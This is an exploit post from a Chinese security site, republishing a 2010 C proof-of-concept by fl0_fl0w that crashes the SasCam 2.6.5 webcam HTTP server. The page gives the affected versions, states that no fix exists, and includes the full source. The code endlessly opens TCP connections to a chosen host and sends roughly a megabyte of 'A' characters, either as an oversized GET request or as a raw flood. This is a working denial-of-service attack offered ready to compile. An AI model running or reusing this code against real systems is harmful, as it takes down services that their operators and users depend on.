首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SasCam v2.6.5 Remote HTTP Server Crash
来源:vfocus.net 作者:fl0_fl0w 发布时间:2010-06-17  

/*
   DISCLAIMER
 
   THIS PROGRAM IS NOT INTENDED TO BE USED ON OTHER COMPUTERS AND IT IS DESTINED FOR PERSONAL RESEARCH ONLY!!!!
   Also the free software programs provided by fl0 fl0w may be freely distributed and that the disclaimer below is always attached to it.
   The programs are provided as is without any guarantees or warranty.
   Although the author has attempted to find and correct any bugs in the free software programs,
     the author is not responsible for any damage or losses of any kind caused by the use or misuse of the programs.
   The author is under no obligation to provide support, service, corrections, or upgrades to the free software programs.  
  
   Author:           fl0 fl0w
   Software:         SasCam 
   Dl link:          http://soft.saschart.com/sascam_webcam_server.php
  
   Afected Versions: 2.65,2.7 and lower
   Remote:           Yes
   Local:            No
   Class:            Boundary Condition Error
   Bug:              HTTP server process termination
   Afected software: Windows 98 or higher{
                                          Windows 98
              Windows ME
                     Windows NT 3.1/3.5/3.51/4.0
                        Windows 2000  
                                          Windows XP Service Pack 2/3
                                          Windows Server 2003
                                          Windows Fundamentals for Legacy PCs
                       Windows Vista
                                          Windows Server 2008
                                          Windows Home Server
                                          Windows 7
                                          Windows Server 2008 R2
                     }
  
   Fix:              No fix   
   Compiler:         gcc version 3.4.4 (cygming special, gdc 0.12, using dmd 0.125) 
   Advice:           To avoid any problems under Windows use cygwin console.
 
   The .C code:
 */

#include<stdio.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<unistd.h>
     typedef int i32;
     typedef char i8;
     typedef short i16;
#define BUFFSZ 9999999                    
#define GET1 "GET /"
#define GET2 " HTTP/1.0\r\n" \
               "\r\n"
#define TITLE "-sasCam 2.6.5 remote http server crash poc\n" \
              "-by fl0 fl0w\n"      
        void copy_str(i8*,i8*,i32);
        void get_arguments(i32,i8**);
        void error_handle(void);
  void mset(i8*,i32,i32);
  void syntax();
    struct{
          i8* host;
          i16 port; 
    i8  ping[BUFFSZ];
    i32 sockets;
    i32 receves;
    i8  recvbytes[BUFFSZ];
    i8  sendbytes[BUFFSZ];
    i32 sizes;
    i32 x;
    i8* option;
    }use;
           int main(int argc,char** argv){
      printf("%s",TITLE);
            get_arguments(argc,argv);
            struct sockaddr_in s;
            use.sizes=sizeof(s);    
            s.sin_family=AF_INET;
            s.sin_addr.s_addr=inet_addr(use.host);
            s.sin_port=htons(use.port);
               printf("[*]connection established\n");
      printf("[*]Sending packets!\n");
           for(;;){ 
                use.x++;
                         use.sockets = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
          if (use.sockets < 0){
          printf("line 81");
                         error_handle();
                        }             
         if (strcmp(use.option, "get") == 0){  
         copy_str(use.sendbytes, GET1, 5);
         mset(use.sendbytes+5,0x41,999999);
         copy_str(use.sendbytes+5+999999, GET2, 17);
                        }else{
         if(strcmp(use.option,"flood")==0){
           mset(use.sendbytes+5,0x41,999999);
         }
      }
                       if(connect(use.sockets,(struct sockaddr*)&s,use.sizes)<0){
          printf("Nr of connections:%d\nline 89:",use.x);
                error_handle();
        }else{
        printf(".");
         } 
            
                       if(send(use.sockets,use.sendbytes,sizeof(use.sendbytes),0)<0){
          printf("Nr of sends:\nline 96:",use.x);
                         error_handle();
                         shutdown(use.sockets,1);
                       }else{
        memset(use.recvbytes,0,BUFFSZ);
        recv(use.sockets,use.recvbytes,BUFFSZ,0);
         }
                    
       }
             printf("[*]Done!\n");
       return 0;
      }
        void copy_str(i8* v,i8* w,i32 len){
                   memcpy(v,w,len);
        }
  void mset(i8* x,i32 y,i32 len){
         memset(x,y,len);
     }
    void get_arguments(i32 argc,i8** argv){
              if(argc<6){
                syntax();
          exit(0);  
     }else{
                     i32 i;
                     argc--;
                     for(i=1;i<argc;i++){
                         switch(argv[i][1]){
                               case'h':
                                       use.host=argv[++i];
                               break;
                               case'p':
                                       use.port=atoi(argv[++i]);
                               break;            
          case'o':
               use.option=argv[++i];
          break;    
                               default:{
                                       printf("error with argument nr %d:(%s)\n",i,argv[i]);
            exit(0);
                               }     
                         }               
                     }
              }
    }
    
     void syntax(){
             i8 *help[]={"\torder of arguments: -h,-p,-o",
                "\t-h hostname",
                         "\t-p port(default 8080)",
       "\t-o option(get/flood)"
                };
                i32 i;
                size_t com=sizeof help / sizeof help[0];
                for(i=0;i<com;i++){
                   printf("%s\n",help[i]);
               }
    }
   
          void error_handle(void){
                   perror("\nError");
                   exit(1);
    }    
   
   


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Winplot 2010 Buffer Overflow P
·AspTR EXtended CSRF Bug
·Infinity 0-day Denial of Servi
·Nakid CMS (fckeditor) Remote A
·File Sharing Wizard v1.5.0 Buf
·Rosoft Audio Converter 4.4.4 B
·Solaris/x86 - Sync() & reboot(
·DMSEasy0.9.7 (fckeditor) Arbit
·Impact PDF Reader v2.0 for iPh
·Mozilla Firefox 3.6.3 Remote D
·QuickOffice v3.1.0 for iPhone/
·Google Chrome 5.0.375.70 Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved